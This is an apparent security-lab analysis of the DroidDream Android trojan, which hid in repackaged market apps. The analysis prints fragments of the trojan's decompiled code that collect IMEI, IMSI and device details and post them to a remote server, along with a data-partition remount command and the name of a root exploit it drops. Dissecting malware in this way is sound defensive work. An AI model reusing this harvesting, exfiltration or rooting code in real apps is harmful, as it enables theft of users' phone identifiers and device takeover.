A latest Android Trojan named "DroidDream" was discovered by mobile security company Lookout Inc. today. This trojan pirates legal application and repacks it as a new one and the malware writer(s) published in Google's offical Android market. More than 50 applications were suffered such attack and now illegally modified ones were pulled out from the market.

     With the collection of published applications in the Google market, other local markets and websites, we did a brief and quick analysis on the samples we have. More detailed information will be updated as the investigation goes on.

     At first, the infected application didn't request too much privilege so the user may not notice any abnormal. For example,

AndroidManifest.xml:
<!-- Only a few privileges are required -->
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.INTERNET" />


        <activity android:name="com.android.root.main
            <intent-filter>
                <!-- Intercept the launch activity -->
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name="com.android.root.Setting" android:process=":remote" />
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" /> 

     Unpack the package, we can found some additional codes were added.

smali/jackpal/androidterm:
Exec.smali

smali/com/android/root:
adbRoot$1.smali  adbRoot.smali  AlarmReceiver$1.smali  AlarmReceiver.smali  main.smali  Setting$1.smali  Setting$2.smali  Setting.smali  udevRoot.smali

lib/armeabi:
libandroidterm.so

     It utilizes JNI, so make the analysis a bit harder.


Exec.smali -> Exec.java :
package jackpal.androidterm;

import java.io.FileDescriptor;

public class Exec
{
  static
  {
    System.loadLibrary("androidterm"); //it calls JNI library "libandroidterm.so"
  }
}


The collected personal data is stored in local Setting.smali,
Setting.smali:
 784     .line 306
 785     .local v1, fm:Ljava/util/Formatter;
 786     const/4 v2, 0x5
 787
 788     new-array v2, v2, [Ljava/lang/Object;
 789
 790     const/4 v3, 0x0
 791
 792     const-string v4, "502"
 793
 794     aput-object v4, v2, v3
 795
 796     const/4 v3, 0x1
 797
 798     const-string v4, "10028"           //trojan version
 799
 800     aput-object v4, v2, v3
 801
 802     const/4 v3, 0x2
 803     //collect mobile IMEI
 804     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;
 805
 806     move-result-object v4
 807
 808     aput-object v4, v2, v3
 809
 810     const/4 v3, 0x3
 811     //collect mobile IMSI
 812     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;
 813
 814     move-result-object v4
 815
 816     aput-object v4, v2, v3
 817
 818     const/4 v3, 0x4
 819
 820     new-instance v4, Ljava/lang/StringBuilder;
 821
 822     sget-object v5, Landroid/os/Build;->DEVICE:Ljava/lang/String;
 823
 824     invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
 825
 826     move-result-object v5
 827
 828     invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
 829
 830     const-string v5, ":"
 831
 832     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
 833
 834     move-result-object v4
 835
 836     sget v5, Landroid/os/Build$VERSION;->SDK_INT:I            //collect mobile android system version
 837
 838     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
 839
 840     move-result-object v4
 841
 842     invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
 843
 844     move-result-object v4
 845
 846     aput-object v4, v2, v3
 847
 848     invoke-virtual {v1, v0, v2}, Ljava/util/Formatter;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/Formatter;
       ....
 855     .end local v0           #data:Ljava/lang/String;
 856     invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B
 857
 858     move-result-object v1
 859
 860     .line 308
 861     .local v1, buff:[B
 862     invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V    //Should have encrypted, but local backup didn't
 863
 864     .line 311
 865     new-instance v0, Ljava/net/URL;
 866
 867     invoke-direct {v0, p0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
 868
 869     .line 312
 870     .local v0, aURL:Ljava/net/URL;
 871     invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
 872
 873     move-result-object p0
 874
 875     .end local p0
 876     check-cast p0, Ljava/net/HttpURLConnection;
 877
 878     .line 313
 879     .local p0, aConnection:Ljava/net/HttpURLConnection;
 880     const/4 v0, 0x1
 881
 882     invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V
       ....

 989     .line 344
 990     const-string p0, "pref_config_setting"  
            //write log into data/data/droiddream/com.droiddream.lovePositions/shared_prefs/pref_config_setting.xml
 991
 992     const/4 v0, 0x0
 993
 994     invoke-virtual {p1, p0, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
 995
 996     .end local v0           #bao:Ljava/io/ByteArrayOutputStream;
 997     move-result-object p0
 998
 999     invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
1000
1001     move-result-object p0
1002
1003     .line 345
1004     .local p0, editor:Landroid/content/SharedPreferences$Editor;
1005     const-string p1, "done"

    From the LogCat, it tries to connect to http://www.umeng.com/app_logs, whois information about umeng.com points to Bejing registrant. The website is an statistic counting service for applications. Seems harmless at first glance.

    It will collect IMEI, IMSI, SDK version, Android OS version, language and etc, and stores to /data/data/droiddream/com.droiddream.lovePositions/shared_prefs/mobclick_agent_header_com.droiddream.lovePositions.xml

    In /data/data/droiddream/com.droiddream.lovePositions/files:

remount_data.sh  remount_sys_ro.sh  remount_sys_rw.sh

The remount_xxx.sh attempts to mount its space to /data, and let itself can access the stored files generated by other applications. The command is similiar to the below.

mount -o remount,rw,nosuid,nodev -t yaffs2 /dev/block/mtdblock1 /data

     It also collects the information under /proc, and stores to /data/data/droiddream/com.droiddream.lovePositions/files/proc

     The snippet of /data/data/droiddream/com.droiddream.lovePositions/files/rageagainstthecage was shown as below figure.

      Check the fie attribute and type of rageagainstthecage, we found: 

    Obviously it's an exectuable file.

    Inside it, the /proc/%d/cmdline is the same way as the code in (http://hiapk.com/viewthread.php?action=printable&tid=585198), so it should be some attempt to root the system. However, we are not sure the intention to root and the actions after root, there are many codes need further analysis. Stay tuned!

By AegisLab.

Analyzer: Zod Lin